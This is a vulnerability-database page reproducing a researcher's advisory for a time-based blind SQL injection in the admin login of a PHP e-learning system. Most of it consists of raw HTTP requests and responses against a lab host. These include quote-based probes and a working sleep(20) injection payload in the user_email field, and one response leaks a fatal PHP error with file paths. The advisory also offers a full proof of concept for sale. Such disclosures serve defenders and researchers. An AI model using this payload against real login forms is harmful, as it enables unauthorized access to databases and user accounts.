logo
DATABASE RESOURCES PRICING ABOUT US

CVE-nu11-101821

Description

## Description: The user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind. A single quote was submitted in the user_email parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. **Recent assessments:** **nu11secur1ty** at October 18, 2021 2:08pm UTC reported: ## [CVE-nu11-101821](<https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html>) ## [Vendor](<https://www.sourcecodester.com/user/51695/activity>) ![](https://raw.githubusercontent.com/nu11secur1ty/CVE-nu11secur1ty/main/vendors/janobe/CVE-nu11-101821/docs/Screenshot%202021-10-18%20140507.png) ## MySQL Request-1: POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e ## MySQL Response-1: Response 1 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:37 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 7099 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... <b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28 Stack trace: #0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...') #1 {main} thrown in <b> ...[SNIP]... * * * ## MySQL Request-2: POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e ## MySQL Response-2 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:40 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6832 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... ## MySQL Request-3 POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e ## MySQL Response-3 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:51 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6811 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... ## Price for decrypting of the PoC: 4000$ ## Reproduce [href](<https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/janobe/CVE-nu11-101821>) ## Proof: [href](<https://streamable.com/f5tk43>) Assessed Attacker Value: 5 Assessed Attacker Value: 5Assessed Attacker Value: 5